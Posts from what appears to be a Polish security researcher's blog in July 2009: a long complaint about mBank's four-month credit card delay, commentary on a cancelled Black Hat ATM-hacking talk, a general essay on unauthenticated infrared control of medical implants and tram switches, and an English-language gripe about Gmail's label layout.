Zastanawiam się, czy można jeszcze bardziej przekroczyć granice absurdu i resztką sił oznajmiam, że nie traktuję telefonu od niego jako jakiejkolwiek próby rozpatrzenia reklamacji i nie mamy o czym rozmawiać. Chwilę potem, zrezygnowany pytam na Blipie, czy ktokolwiek zna jakiegokolwiek pracownika mBanku, który posiada IQ większe od proszku do prania?

Tego samego dnia. Internet - Blip & Twitter

Odzywają się 2 osoby pracujące w polskim mBanku (Rafał B. i Ania P.) oraz Adam z czeskiego mBanku, który jak się okazuje prowadzi monitoring Twittera, a na mój wpis trafił po tagu mBank. Wszystkie trzy osoby obiecują zająć się sprawą i już następnego dnia dostaję telefon z mBanku od Tomasza K., który jako jedyny pracownik tego banku w ciągu ostatnich 4 miesięcy, był w stanie wyjaśnić mi co się dzieje z moją kartą i kiedy ją otrzymam.

W ramach rekompensaty dostaję zwrot opłaty za kartę (kilkadziesiąt złotych), co nie starczy zapewne nawet na pokrycie rachunków telefonicznych na mLinię, nie mówiąc już o dwa rzędy wyższych szkodach spowodowanych zmarnotrawieniem mojego czasu i tłamszeniem mojej psychiki... Tylko na tyle Cię stać, mBanku, który obniżasz oprocentowanie moich lokat regularnie z kwartału na kwartał?

Podsumowanie

Załatwienie karty kredytowej w mBanku zajęło mi 4 długie miesiące. Od dziś mBank rozwijam więc jako mogłeś_wybrać_lepszy_Bank. No cóż, pozostaje mi znaleźć inny bank, i podziękować blipowiczo-twitterowiczom za błyskawiczne i skuteczne działania, które zakończyły moje cierpienia. Mam nadzieję, że aby kolejny raz załatwić coś w mBanku, nie będę musiał porównywać na Blipie/Twitterze inteligencji jego pracowników do proszku do prania...

Jeśli macie swoje mBankowe hejtstory, piszcie w komentarzach, niech się ludzie dowiedzą!

P.S. Okazuje się, że nie tylko ja natknąłem mBankowe absurdy...

P.P.S A kartę dostałem w ostatni piątek. Jest tak kiepskiej jakości, że farba już zdążyła się przetrzeć w kilku miejscach... Ale działa. Jeszcze :>

AKTUALIZACJA [10:33, 20.07.2009]

Na podstawie powyższego posta (i kilku innych wydarzeń), Gazeta Wyborcza publikuje artykuł o "przyśpieszaniu" reklamacji poprzez narzekania użytkowników w Internecie.

AKTUALIZACJA [15:56, 24.07.2009]

W trakcie pisania postu, zapomniałem o jeszcze jednym świetnym e-mailu, który przyszedł do mnie z mBanku w odpowiedzi na reklamację:

Tekturowe karty kredytowe...

Sat, 11 Jul 2009 11:12:27 +0200

Dziś, niesamowicie ubawił mnie pewien artykuł:

P.S. Przypominam, że podobne śmiesznostki związane nie tylko z bezpieczeństwem sieci, zbieram i udostępniam pod nazwą geekfun — miłego przeglądania!

Prezentacja o hackowaniu bankomatów odwołana

Thu, 09 Jul 2009 20:52:37 +0200

Nie, nie chodzi o moją ;-) Na początku lipca, pod naciskiem producentów bankomatów, firma Juniper zabroniła swojemu pracownikowi pokazania na konferencji BlackHat zapowiedzianej wcześniej prezentacji dotyczącej błędów w bankomatach.

Wykład Jack'a Barnaby miał zaprezentować zarówno lokalne jak i zdalne ataki na bankomaty różnych producentów. Tak szerokie potraktowanie tematu przez Barnabę może wskazywać na lukę nie w sprzęcie, a w oprogramowaniu firmy Diebold, powszechnie wykorzystywanym przez większośc producentów bankomatów.

Historia lubi się powtarzać

Historia zna już przypadek, kiedy to błąd w oprogramowaniu firmy Diebold pozwolił na kradzież danych z bankomatu i manipulacje przy kasetkach z pieniędzmi.

Historia zna równiez przypadek, kiedy to prezentacje na BlackHacie były wycofywane ze względu na naciski firm, do których należało omawiane (dziurawe) oprogramowanie. W 2008, Apple zabroniło wygłoszenia wykładu o lukach w FileVault, a w 2007 mój były pracodawca naciskał na zdjęcie z agendy prezentacji o błędach w chipach RFID...

Najciekawszy przypadek, to jednak Mike Lynn, który w 2005 został pozbawiony przez Cisco (a także własnych przełożonych, od których wcześniej otrzymał zgodę) możliwości opowiedzenia o poważnej luce w systemie IOS. Mike dał jednak prezentację, zwalniając się z pracy na chwilę przed wykładem... Po wykładzie zapytał, czy ktoś nie chciałby go zatrudnić i dostał wtedy ofertę od firmy ...Juniper -- czyli tej samej, która teraz odwołuje prezentację swojego innego pracownika... (o ironio!)

P.S. Wygląda na to, że w Polsce wolność słowa jest bardziej szanowana - swoją prezentację o atakach na bankomaty wygłosiłem już w 4 różnych miejscach... ;-)

2 firewalle proszę, jeden na mózg, drugi na serce

Wed, 08 Jul 2009 20:50:23 +0200

Nie jest tajemnicą, że najnowsza technologia przyśpiesza i usprawnia prawie każdy przemysł, także medyczny... Lekarze wszczepiają pacjentom różnego rodzaju implanty, począwszy od tych "pasywnych", których zadaniem jest tylko monitorować stan zdrowia pacjenta, aż po implanty "aktywne" — dawkujące leki lub pobudzające niektóre funkcje narządów wewnętrznych człowieka.

Implanty, jak to urządzenia elektromechaniczne, od czasu do czasu potrzebują zgrania zebranych danych lub drobnego przeprogramowania (rzadziej doładowania). Najczęściej do komunikacji z implantem wykorzystuje się podczerwień... i właśnie tu pojawia się pewien problem.

Jak zalogować się na implant?

Otóż, wcale logować się nie trzeba... Implanty nie zostały bowiem wyposażone w żadne mechanizmy uwierzytelniania. Dlatego przeprogramować może je każdy, a nie tylko opiekujący się pacjentem ~~programista~~ lekarz ;-)

Sytuacja jest podobna do wspominanych na moim wykładzie czytników kodów kreskowych — aby przeprogramować implant, należy poznać odpowiedni ciąg kodów, który wyślemy podczerwienią, a który zdobędziemy z ...ogólnodostępnej instrukcji obsługi implantu.

Pewnie wydaje ci się teraz, że "ataki na implant" to odległa przyszłość? Że potrzeba nie lada wiedzy i w ogóle, kto by się odważył poigrać z życiem drugiego człowieka? No to mam dla ciebie analogiczną historię, zamieńmy tylko radiowo sterowany implant na zwrotnicę tramwajową, a człowieka na wagon pełny ludzi:

Łódź. Policjanci zatrzymali w środę 14-latka (...) W miejscu jego zamieszkania zabezpieczyli urządzenie, którego wygląd i konstrukcja wskazywały na promiennik podczerwieni sterujący położeniem zwrotnic tramwajowych. Chłopak został oskarżony o przełączenie zwrotnicy podczas przejazdu tramwaju, co spowodowało wykolejenie się jednego z wagonów. Oskarżony przyznał się do winy.

Jak widać, nie tylko implanty podatne są na ataki — tramwajowe zwrotnice też nie posiadają żadnych mechanizmów uwierzytelniania i znów wystarczy odpowiedni kod wysłany poprzez podczerwień, by trochę namieszać. Trzeba dodać, że kod sterujący pracą zwrotnicy za każdym razem jest taki sam i bardzo łatwo można go "podsłuchać"...

Testy penetracyjne zwrotnic i implantów?

Implanty medyczne to modelowy wręcz przykład na to, jak istotnym jest, aby nowe technologie wdrażane poza świadomym "hackerów" rynkiem IT były projektowane z myślą o bezpieczeństwie i poddawane okresowym testom penetracyjnym...

W przeciwnym razie, doczekamy się pewnie produktów takich jak firewalle dla narządów wewnętrznych lub personalne klatki Faraday'a... chociaż obawiam się, że oba wynalazki moga mieć trudności w uchronieniu nas przed skutkami przestawienia zwrotnicy tramwajowej...

P.S. Zastanawiam się, ile czasu upłynie, zanim na rynku pojawią się pierwsze piloty do TV z przyciskami podpisanymi "przypraw o atak serca"...?

GMail - Right Side Labels

Thu, 02 Jul 2009 09:30:39 +0200

I'm so annoyed by this! Yesterday, Google changed GMail's look & feel — now we are forced to have our labels on the left side... Argh!!! And this is completely non-functional if you have more than just a few of them!

I used labels (together with "skip-the-inbox" filtering) to keep the inbox clean and automatically move my mail under a proper label (=folder). Because I use more than 20 labels, it is now VERY frustrating to scroll up and down all the time, just to check for new messages :-(

So, there you have it Google, left side of our screens is clogged now, and right side is empty. Moreover, GMail's Drag & Drop Lab feature doesn't work with Google Calendar / Google Docs gadgets, and "Labels on the right side" extension disappeared completely. GMail is not functional or flexible anymore...

Want Right Side Labels?

If you want Google to bring back the right side labels or allow us to drag Google Calendar / Docs gadgets to the right side of the screen, post your comment in their Help Forum ("I agree" is enough).

(3/06/2009) EDITED TO ADD:
Google put up a help page for new labels, as well as a questionnaire — now you can say, how much you (dis)like new labels and describe why. Do it now!